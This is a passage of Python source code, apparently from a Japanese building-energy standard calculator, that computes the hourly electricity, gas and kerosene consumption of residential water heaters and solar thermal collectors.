print('W_ba1 = {}'.format(np.sum(W_ba1_d_t)))
print('W_dash_k = {}'.format(np.sum(W_dash_k_d_t)))
print('W_dash_s = {}'.format(np.sum(W_dash_s_d_t)))
print('W_dash_w = {}'.format(np.sum(W_dash_w_d_t)))
print('W_dash_b1 = {}'.format(np.sum(W_dash_b1_d_t)))
print('W_dash_b2 = {}'.format(np.sum(W_dash_b2_d_t)))
print('W_dash_ba1 = {}'.format(np.sum(W_dash_ba1_d_t)))
print('L_dash_k = {}'.format(np.sum(L_dash_k_d_t)))
print('L_dash_s = {}'.format(np.sum(L_dash_s_d_t)))
print('L_dash_w = {}'.format(np.sum(L_dash_w_d_t)))
print('L_dash_b1 = {}'.format(np.sum(L_dash_b1_d_t)))
print('L_dash_b2 = {}'.format(np.sum(L_dash_b2_d_t)))
print('L_dash_ba1 = {}'.format(np.sum(L_dash_ba1_d_t)))
print('L_dash_ba2 = {}'.format(np.sum(L_dash_ba2_d_t)))
print('L_dashdash_k = {}'.format(np.sum(L_dashdash_k_d_t)))
print('L_dashdash_s = {}'.format(np.sum(L_dashdash_s_d_t)))
print('L_dashdash_w = {}'.format(np.sum(L_dashdash_w_d_t)))
print('L_dashdash_b1 = {}'.format(np.sum(L_dashdash_b1_d_t)))
print('L_dashdash_b2 = {}'.format(np.sum(L_dashdash_b2_d_t)))
print('L_dashdash_ba1 = {}'.format(np.sum(L_dashdash_ba1_d_t)))
print('L_dashdash_ba2 = {}'.format(np.sum(L_dashdash_ba2_d_t)))
return {
'L_dash_k_d_t': L_dash_k_d_t,
'L_dash_s_d_t': L_dash_s_d_t,
'L_dash_w_d_t': L_dash_w_d_t,
'L_dash_b1_d_t': L_dash_b1_d_t,
'L_dash_b2_d_t': L_dash_b2_d_t,
'L_dash_ba1_d_t': L_dash_ba1_d_t,
'L_dash_ba2_d_t': L_dash_ba2_d_t,
'L_dashdash_k_d_t': L_dashdash_k_d_t,
'L_dashdash_s_d_t': L_dashdash_s_d_t,
'L_dashdash_w_d_t': L_dashdash_w_d_t,
'L_dashdash_b1_d_t': L_dashdash_b1_d_t,
'L_dashdash_b2_d_t': L_dashdash_b2_d_t,
'L_dashdash_ba1_d_t': L_dashdash_ba1_d_t,
'L_dashdash_ba2_d_t': L_dashdash_ba2_d_t,
'W_dash_k_d_t': W_dash_k_d_t,
'W_dash_s_d_t': W_dash_s_d_t,
'W_dash_w_d_t': W_dash_w_d_t,
'W_dash_b1_d_t': W_dash_b1_d_t,
'W_dash_b2_d_t': W_dash_b2_d_t,
'W_dash_ba1_d_t': W_dash_ba1_d_t,
'theta_ex_d_Ave_d': theta_ex_d_Ave_d,
'Theta_ex_Nave_d': Theta_ex_Nave_d
}
def calc_E_E_W_d_t(n_p, L_HWH, heating_flag_d, region, sol_region, HW, SHC):
"""1時間当たりの給湯設備の消費電力量 (1)
Args:
n_p(float): 仮想居住人数 (人)
L_HWH(ndarray): 温水暖房用熱源機の熱負荷
heating_flag_d(ndarray): 暖房日
region(int): 省エネルギー地域区分
sol_region(int): 年間の日射地域区分(1-5)
HW(dict): 給湯機の仕様
SHC(dict): 集熱式太陽熱利用設備の仕様
Returns:
ndarray: 1時間当たりの給湯設備の消費電力量 (kWh/h)
"""
if HW is None or HW['hw_type'] is None:
# 台所、洗面所及び浴室等がいずれも無い場合は0とする
return np.zeros(24 * 365)
if HW['hw_type'] == 'コージェネレーションを使用する':
return np.zeros(24 * 365)
# ふろ機能の修正
bath_function = get_normalized_bath_function(HW['hw_type'], HW.get('bath_function'))
# 給湯負荷の生成
args = {
'n_p': n_p,
'region': region,
'sol_region': sol_region,
'has_bath': HW['has_bath'],
'bath_function': bath_function,
'pipe_diameter': HW['pipe_diameter'],
'kitchen_watersaving_A': HW['kitchen_watersaving_A'],
'kitchen_watersaving_C': HW['kitchen_watersaving_C'],
'shower_watersaving_A': HW['shower_watersaving_A'],
'shower_watersaving_B': HW['shower_watersaving_B'],
'washbowl_watersaving_C': HW['washbowl_watersaving_C'],
'bath_insulation': HW['bath_insulation']
}
if SHC is not None:
if SHC['type'] == '液体集熱式':
args.update({
'type': SHC['type'],
'ls_type': SHC['ls_type'],
'A_sp': SHC['A_sp'],
'P_alpha_sp': SHC['P_alpha_sp'],
'P_beta_sp': SHC['P_beta_sp'],
'W_tnk_ss': SHC['W_tnk_ss']
})
elif SHC['type'] == '空気集熱式':
args.update({
'type': SHC['type'],
'hotwater_use': SHC['hotwater_use'],
'heating_flag_d': tuple(heating_flag_d),
'A_col': SHC['A_col'],
'P_alpha': SHC['P_alpha'],
'P_beta': SHC['P_beta'],
'V_fan_P0': SHC['V_fan_P0'],
'm_fan_test': SHC['m_fan_test'],
'd0': SHC['d0'],
'd1': SHC['d1'],
'W_tnk_ass': SHC['W_tnk_ass']
})
else:
raise ValueError(SHC['type'])
hotwater_load = calc_hotwater_load(**args)
# 1時間当たりの給湯機の消費電力量 (kWh/h)
E_E_hs_d_t = calc_E_E_hs_d_t(
hw_type=HW['hw_type'],
bath_function=bath_function,
hybrid_category=HW['hybrid_category'],
package_id=HW.get('package_id'),
hybrid_param=HW.get('hybrid_param'),
e_rtd=HW['e_rtd'],
e_dash_rtd=HW['e_dash_rtd'],
L_dashdash_k_d_t=hotwater_load['L_dashdash_k_d_t'],
L_dashdash_s_d_t=hotwater_load['L_dashdash_s_d_t'],
L_dashdash_w_d_t=hotwater_load['L_dashdash_w_d_t'],
L_dashdash_b1_d_t=hotwater_load['L_dashdash_b1_d_t'],
L_dashdash_b2_d_t=hotwater_load['L_dashdash_b2_d_t'],
L_dashdash_ba1_d_t=hotwater_load['L_dashdash_ba1_d_t'],
L_dashdash_ba2_d_t=hotwater_load['L_dashdash_ba2_d_t'],
W_dash_k_d_t=hotwater_load['W_dash_k_d_t'],
W_dash_s_d_t=hotwater_load['W_dash_s_d_t'],
W_dash_w_d_t=hotwater_load['W_dash_w_d_t'],
W_dash_b1_d_t=hotwater_load['W_dash_b1_d_t'],
W_dash_b2_d_t=hotwater_load['W_dash_b2_d_t'],
W_dash_ba1_d_t=hotwater_load['W_dash_ba1_d_t'],
theta_ex_d_Ave_d=hotwater_load['theta_ex_d_Ave_d'],
Theta_ex_Nave_d=hotwater_load['Theta_ex_Nave_d'],
L_HWH=L_HWH,
CO2HP=HW['CO2HP'] if 'CO2HP' in HW else None
)
# 太陽熱利用設備の補機の消費電力量
E_E_aux_ss_d_t = calc_E_E_aux_ss_d_t(
SHC=SHC,
region=region,
sol_region=sol_region,
heating_flag_d=heating_flag_d
)
# 1時間当たりの給湯設備の消費電力量(1)
E_E_W_d_t = E_E_hs_d_t + E_E_aux_ss_d_t
return E_E_W_d_t
def calc_E_E_aux_ss_d_t(SHC, region=None, sol_region=None, heating_flag_d=None):
"""1時間当たりの補機の消費電力量 (kWh/h)
Args:
SHC(dict): 太陽熱利用設備の仕様
region(int, optional): 省エネルギー地域区分 (Default value = None)
sol_region(int, optional): 年間の日射地域区分 (Default value = None)
heating_flag_d(ndarray, optional): 暖房日 (Default value = None)
Returns:
ndarray: 1時間当たりの補機の消費電力量 (kWh/h)
"""
if SHC is None:
return np.zeros(24 * 365)
elif SHC['type'] == '液体集熱式':
# 第九章「自然エネルギー利用設備」第二節「液体集熱式太陽熱利用設備」の算定方法により定まる
# 1時間当たりの補機の消費電力量 (kWh/h)
return lss.calc_E_E_lss_aux_d_t(
ls_type=SHC['ls_type'],
pmp_type='上記以外の機種',
P_alpha_sp=SHC['P_alpha_sp'],
P_beta_sp=SHC['P_beta_sp'],
region=region,
sol_region=sol_region
)
elif SHC['type'] == '空気集熱式':
# 第九章「自然エネルギー利用設備」第三節「空気集熱式太陽熱利用設備」の算定方法により定まる
# 1時間当たりの補機の消費電力量のうちの給湯設備への付加分 (kWh/h)
return ass.calc_E_E_W_aux_ass_d_t(
hotwater_use=SHC['hotwater_use'],
heating_flag_d=heating_flag_d,
region=region,
sol_region=sol_region,
P_alpha=SHC['P_alpha'],
P_beta=SHC['P_beta'],
A_col=SHC['A_col'],
V_fan_P0=SHC['V_fan_P0'],
m_fan_test=SHC['m_fan_test'],
d0=SHC['d0'],
d1=SHC['d1'],
fan_sso=SHC['fan_sso'],
fan_type=SHC['fan_type'],
pump_sso=SHC['pump_sso']
)
else:
raise ValueError(SHC['type'])
# ============================================================================
# 5.2 ガス消費量
# ============================================================================
def calc_E_G_W_d_t(n_p, L_HWH, heating_flag_d, A_A, region, sol_region, HW, SHC):
"""1時間当たりの給湯設備のガス消費量 (MJ/h) (2)
Args:
n_p(float): 仮想居住人数
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
heating_flag_d(ndarray): 暖房日
A_A(float): 床面積の合計 (m2)
region(int): 省エネルギー地域区分
sol_region(int): 年間の日射地域区分
HW(dict): 給湯機の仕様
SHC(dict): 集熱式太陽熱利用設備の仕様
Returns:
ndarray: 1時間当たりの給湯設備のガス消費量 (MJ/h)
"""
if HW is None or HW['hw_type'] is None:
# 台所、洗面所及び浴室等がいずれも無い場合は0とする
return np.zeros(24 * 365)
# ふろ機能の修正
bath_function = get_normalized_bath_function(HW['hw_type'], HW.get('bath_function'))
# 給湯負荷の生成
args = {
'n_p': n_p,
'region': region,
'sol_region': sol_region,
'has_bath': HW['has_bath'],
'bath_function': bath_function,
'pipe_diameter': HW['pipe_diameter'],
'kitchen_watersaving_A': HW['kitchen_watersaving_A'],
'kitchen_watersaving_C': HW['kitchen_watersaving_C'],
'shower_watersaving_A': HW['shower_watersaving_A'],
'shower_watersaving_B': HW['shower_watersaving_B'],
'washbowl_watersaving_C': HW['washbowl_watersaving_C'],
'bath_insulation': HW['bath_insulation']
}
if SHC is not None:
if SHC['type'] == '液体集熱式':
args.update({
'type': SHC['type'],
'ls_type': SHC['ls_type'],
'A_sp': SHC['A_sp'],
'P_alpha_sp': SHC['P_alpha_sp'],
'P_beta_sp': SHC['P_beta_sp'],
'W_tnk_ss': SHC['W_tnk_ss']
})
elif SHC['type'] == '空気集熱式':
args.update({
'type': SHC['type'],
'hotwater_use': SHC['hotwater_use'],
'heating_flag_d': tuple(heating_flag_d),
'A_col': SHC['A_col'],
'P_alpha': SHC['P_alpha'],
'P_beta': SHC['P_beta'],
'V_fan_P0': SHC['V_fan_P0'],
'm_fan_test': SHC['m_fan_test'],
'd0': SHC['d0'],
'd1': SHC['d1'],
'W_tnk_ass': SHC['W_tnk_ass']
})
else:
raise ValueError(SHC['type'])
hotwater_load = calc_hotwater_load(**args)
# 1日当たりの給湯機のガス消費量
E_G_hs_d = calc_E_G_hs_d(
hw_type=HW['hw_type'],
hybrid_category=HW['hybrid_category'],
e_rtd=HW['e_rtd'],
e_dash_rtd=HW['e_dash_rtd'],
bath_function=bath_function,
package_id=HW.get('package_id'),
L_dashdash_k_d_t=hotwater_load['L_dashdash_k_d_t'],
L_dashdash_s_d_t=hotwater_load['L_dashdash_s_d_t'],
L_dashdash_w_d_t=hotwater_load['L_dashdash_w_d_t'],
L_dashdash_b1_d_t=hotwater_load['L_dashdash_b1_d_t'],
L_dashdash_b2_d_t=hotwater_load['L_dashdash_b2_d_t'],
L_dashdash_ba1_d_t=hotwater_load['L_dashdash_ba1_d_t'],
L_dashdash_ba2_d_t=hotwater_load['L_dashdash_ba2_d_t'],
W_dash_k_d_t=hotwater_load['W_dash_k_d_t'],
W_dash_s_d_t=hotwater_load['W_dash_s_d_t'],
W_dash_w_d_t=hotwater_load['W_dash_w_d_t'],
W_dash_b1_d_t=hotwater_load['W_dash_b1_d_t'],
W_dash_b2_d_t=hotwater_load['W_dash_b2_d_t'],
W_dash_ba1_d_t=hotwater_load['W_dash_ba1_d_t'],
Theta_ex_Ave=hotwater_load['theta_ex_d_Ave_d'],
Theta_ex_Nave=hotwater_load['Theta_ex_Nave_d'],
L_HWH=L_HWH,
hybrid_param=HW.get('hybrid_param')
)
return E_G_hs_d
# ============================================================================
# 5.3 灯油消費量
# ============================================================================
def calc_E_K_W_d_t(n_p, L_HWH, heating_flag_d, A_A, region, sol_region, HW, SHC):
"""1時間当たりの給湯設備の灯油消費量 (MJ/h) (3)
Args:
n_p(float): 仮想居住人数
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
heating_flag_d(ndarray): 暖房日
A_A(float): 床面積の合計 (m2)
region(int): 省エネルギー地域区分
sol_region(int): 年間の日射地域区分
HW(dict): 給湯機の仕様
SHC(dict): 集熱式太陽熱利用設備の仕様
Returns:
ndarray: 1時間当たりの給湯設備の灯油消費量 (MJ/h) (3)
"""
if HW is None or HW['hw_type'] is None:
# 台所、洗面所及び浴室等がいずれも無い場合は0とする
return np.zeros(24 * 365)
# ふろ機能の修正
bath_function = get_normalized_bath_function(HW['hw_type'], HW.get('bath_function'))
# 給湯負荷の生成
args = {
'n_p': n_p,
'region': region,
'sol_region': sol_region,
'has_bath': HW['has_bath'],
'bath_function': bath_function,
'pipe_diameter': HW['pipe_diameter'],
'kitchen_watersaving_A': HW['kitchen_watersaving_A'],
'kitchen_watersaving_C': HW['kitchen_watersaving_C'],
'shower_watersaving_A': HW['shower_watersaving_A'],
'shower_watersaving_B': HW['shower_watersaving_B'],
'washbowl_watersaving_C': HW['washbowl_watersaving_C'],
'bath_insulation': HW['bath_insulation']
}
if SHC is not None:
if SHC['type'] == '液体集熱式':
args.update({
'type': SHC['type'],
'ls_type': SHC['ls_type'],
'A_sp': SHC['A_sp'],
'P_alpha_sp': SHC['P_alpha_sp'],
'P_beta_sp': SHC['P_beta_sp'],
'W_tnk_ss': SHC['W_tnk_ss']
})
elif SHC['type'] == '空気集熱式':
args.update({
'type': SHC['type'],
'hotwater_use': SHC['hotwater_use'],
'heating_flag_d': tuple(heating_flag_d),
'A_col': SHC['A_col'],
'P_alpha': SHC['P_alpha'],
'P_beta': SHC['P_beta'],
'V_fan_P0': SHC['V_fan_P0'],
'm_fan_test': SHC['m_fan_test'],
'd0': SHC['d0'],
'd1': SHC['d1'],
'W_tnk_ass': SHC['W_tnk_ass']
})
else:
raise ValueError(SHC['type'])
hotwater_load = calc_hotwater_load(**args)
# 1時間当たりの給湯機の灯油消費量 (MJ/h)
E_k_hs_d_t = calc_E_K_hs_d_t(
hw_type=HW['hw_type'],
e_rtd=HW['e_rtd'],
e_dash_rtd=HW['e_dash_rtd'],
bath_function=bath_function,
L_dashdash_k_d_t=hotwater_load['L_dashdash_k_d_t'],
L_dashdash_s_d_t=hotwater_load['L_dashdash_s_d_t'],
L_dashdash_w_d_t=hotwater_load['L_dashdash_w_d_t'],
L_dashdash_b1_d_t=hotwater_load['L_dashdash_b1_d_t'],
L_dashdash_b2_d_t=hotwater_load['L_dashdash_b2_d_t'],
L_dashdash_ba1_d_t=hotwater_load['L_dashdash_ba1_d_t'],
L_dashdash_ba2_d_t=hotwater_load['L_dashdash_ba2_d_t'],
theta_ex_d_Ave_d=hotwater_load['theta_ex_d_Ave_d']
)
return E_k_hs_d_t
# ============================================================================
# 5.4 その他の燃料による一次エネルギー消費量
# ============================================================================
def get_E_M_W_d_t():
"""1時間当たりの給湯設備のその他の燃料による一次エネルギー消費量
Args:
Returns:
ndarray: 1時間当たりの給湯設備のその他の燃料による一次エネルギー消費量
"""
# 1時間当たりの給湯設備のその他の燃料による一次エネルギー消費量は0とする
return np.zeros(24 * 365)
# ============================================================================
# 6. 給湯機のエネルギー消費量
# ============================================================================
def calc_E_E_hs_d_t(hw_type, bath_function, package_id, hybrid_param, hybrid_category, e_rtd, e_dash_rtd, Theta_ex_Nave_d, W_dash_k_d_t, W_dash_s_d_t,
W_dash_w_d_t,
W_dash_b1_d_t,
W_dash_b2_d_t, W_dash_ba1_d_t, theta_ex_d_Ave_d, L_dashdash_k_d_t, L_dashdash_s_d_t, L_dashdash_w_d_t,
L_dashdash_b1_d_t,
L_dashdash_b2_d_t, L_dashdash_ba1_d_t, L_dashdash_ba2_d_t, L_HWH, CO2HP):
"""1時間当たりの給湯機の消費電力量 (kWh/h)
Args:
hw_type(str): 給湯機/給湯温水暖房機の種類
bath_function(str): ふろ機能の種類
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
package_id(str): パッケージID
hybrid_param(dict): ハイブリッドパラメーター
e_rtd(float): 当該給湯機の効率
e_dash_rtd(float): 「エネルギーの使用の合理化に関する法律」に基づく「特定機器の性能の向上に関する製造事業者等の判断の基準等」(ガス温水機器)に定義される「エネルギー消費効率」
Theta_ex_Nave_d(ndarray): 夜間平均外気温 (℃)
W_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯量 (L/h)
W_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯量 (L/h)
W_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯量 (L/h)
W_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/h)
W_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯量 (L/h)
W_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯量 (L/h)
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
CO2HP(dict): CO2HPのパラメーター
Returns:
ndarray: 1時間当たりの給湯機の消費電力量 (kWh/h)
"""
if hw_type == 'ガス従来型給湯機' or hw_type == 'ガス従来型給湯温水暖房機' \
or hw_type == 'ガス潜熱回収型給湯機' or hw_type == 'ガス潜熱回収型給湯温水暖房機':
return gas.calc_E_E_hs_d_t(
W_dash_k_d_t=W_dash_k_d_t,
W_dash_s_d_t=W_dash_s_d_t,
W_dash_w_d_t=W_dash_w_d_t,
W_dash_b1_d_t=W_dash_b1_d_t,
W_dash_b2_d_t=W_dash_b2_d_t,
W_dash_ba1_d_t=W_dash_ba1_d_t,
theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == '石油従来型給湯機' or hw_type == '石油従来型給湯温水暖房機' \
or hw_type == '石油潜熱回収型給湯機' or hw_type == '石油潜熱回収型給湯温水暖房機':
return oil.calc_E_E_hs_d_t(W_dash_k_d_t=W_dash_k_d_t, W_dash_s_d_t=W_dash_s_d_t, W_dash_w_d_t=W_dash_w_d_t,
W_dash_b1_d_t=W_dash_b1_d_t, W_dash_ba1_d_t=W_dash_ba1_d_t,
W_dash_b2_d_t=W_dash_b2_d_t, theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t)
elif hw_type == '電気ヒートポンプ給湯機':
return eheatpump.calc_E_E_hs_d_t(
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b1_d_t=L_dashdash_b1_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba1_d_t=L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t,
e_rtd=e_rtd,
theta_ex_d_Ave_d=theta_ex_d_Ave_d,
theta_ex_Nave_d=Theta_ex_Nave_d,
CO2HP=CO2HP
)
elif hw_type == '電気ヒーター給湯機' or hw_type == '電気ヒーター給湯温水暖房機':
return eheater.calc_E_E_hs_d_t(
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b1_d_t=L_dashdash_b1_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba1_d_t=L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t,
theta_ex_d_Ave_d=theta_ex_d_Ave_d
)
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(仕様による)':
return hybrid_gas.calc_E_E_hs_d_t(
hybrid_category=hybrid_category,
theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(試験された値を用いる)':
return hybrid_gas_3.calc_E_E_hs_d_t(
bath_function=bath_function,
package_id=package_id,
hybrid_param=hybrid_param,
W_dash_ba1_d_t=W_dash_ba1_d_t,
theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b1_d_t=L_dashdash_b1_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba1_d_t=L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return gas_hybrid.get_E_E_hs(
W_dash_k_d_t=W_dash_k_d_t,
W_dash_s_d_t=W_dash_s_d_t,
W_dash_w_d_t=W_dash_w_d_t,
W_dash_b1_d_t=W_dash_b1_d_t,
W_dash_b2_d_t=W_dash_b2_d_t,
W_dash_ba1_d_t=W_dash_ba1_d_t,
theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return whybrid.calc_E_E_hs_d_t(
L_HWH=L_HWH,
hybrid_category=hybrid_category,
theta_ex_d_Ave_d=theta_ex_d_Ave_d,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
else:
raise ValueError(hw_type)
def calc_E_G_hs_d(hw_type, hybrid_category, e_rtd, e_dash_rtd, bath_function, package_id, Theta_ex_Nave, W_dash_k_d_t, W_dash_s_d_t,
W_dash_w_d_t, W_dash_b1_d_t, W_dash_b2_d_t, W_dash_ba1_d_t, Theta_ex_Ave, L_dashdash_k_d_t,
L_dashdash_s_d_t, L_dashdash_w_d_t,
L_dashdash_b1_d_t, L_dashdash_b2_d_t, L_dashdash_ba1_d_t, L_dashdash_ba2_d_t, L_HWH, hybrid_param):
"""1日当たりの給湯機のガス消費量
Args:
hw_type(str): 給湯機/給湯温水暖房機の種類
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
e_rtd(float): 当該給湯機の効率
e_dash_rtd(float): 「エネルギーの使用の合理化に関する法律」に基づく「特定機器の性能の向上に関する製造事業者等の判断の基準等」(ガス温水機器)に定義される「エネルギー消費効率」
bath_function(str): ふろ機能の種類
Theta_ex_Nave(ndarray): 夜間平均外気温 (℃)
W_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯量 (L/h)
W_dash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における節湯補正給湯量 (L/h)
W_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯量 (L/h)
W_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/h)
W_dash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における節湯補正給湯量 (L/h)
W_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における節湯補正給湯量 (L/h)
Theta_ex_Ave(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
package_id(str): パッケージID
hybrid_param(dict): ハイブリッドパラメーター
Returns:
ndarray: 1時間当たりの給湯機のガス消費量 (MJ/h)
"""
if hw_type == 'ガス従来型給湯機' or hw_type == 'ガス従来型給湯温水暖房機' \
or hw_type == 'ガス潜熱回収型給湯機' or hw_type == 'ガス潜熱回収型給湯温水暖房機':
return gas.calc_E_G_hs_d_t(
hw_type=hw_type,
e_rtd=e_rtd,
e_dash_rtd=e_dash_rtd,
theta_ex_d_Ave_d=Theta_ex_Ave,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b1_d_t=L_dashdash_b1_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba1_d_t=L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t,
bath_function=bath_function
)
elif hw_type == '石油従来型給湯機' or hw_type == '石油従来型給湯温水暖房機' \
or hw_type == '石油潜熱回収型給湯機' or hw_type == '石油潜熱回収型給湯温水暖房機':
return oil.get_E_G_hs_d_t()
elif hw_type == '電気ヒートポンプ給湯機':
return eheatpump.get_E_G_hs_d_t()
elif hw_type == '電気ヒーター給湯機' or hw_type == '電気ヒーター給湯温水暖房機':
return eheater.get_E_G_hs()
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(仕様による)':
return hybrid_gas.calc_E_G_hs_d_t(
hybrid_category=hybrid_category,
theta_ex_d_Ave_d=Theta_ex_Ave,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t
)
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' \
or hw_type == '電気ヒートポンプ・ガス併用型給湯機(試験された値を用いる)':
return hybrid_gas_3.get_E_G_hs_d_t(
bath_function=bath_function,
package_id=package_id,
theta_ex_d_Ave_d=Theta_ex_Ave,
L_dashdash_k_d_t=L_dashdash_k_d_t,
L_dashdash_s_d_t=L_dashdash_s_d_t,
L_dashdash_w_d_t=L_dashdash_w_d_t,
L_dashdash_b1_d_t=L_dashdash_b1_d_t,
L_dashdash_b2_d_t=L_dashdash_b2_d_t,
L_dashdash_ba1_d_t=L_dashdash_ba1_d_t,
L_dashdash_ba2_d_t=L_dashdash_ba2_d_t,
W_dash_ba1_d_t=W_dash_ba1_d_t,
hybrid_param=hybrid_param
)
elif hw_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return gas_hybrid.get_E_G_hs(
Theta_ex_Ave=Theta_ex_Ave,
L_dashdash_k=L_dashdash_k_d_t,
L_dashdash_s=L_dashdash_s_d_t,
L_dashdash_w=L_dashdash_w_d_t,
L_dashdash_b1=L_dashdash_b1_d_t,
L_dashdash_b2=L_dashdash_b2_d_t,
L_dashdash_ba1=L_dashdash_ba1_d_t,
L_dashdash_ba2=L_dashdash_ba2_d_t,
bath_function=bath_function
)
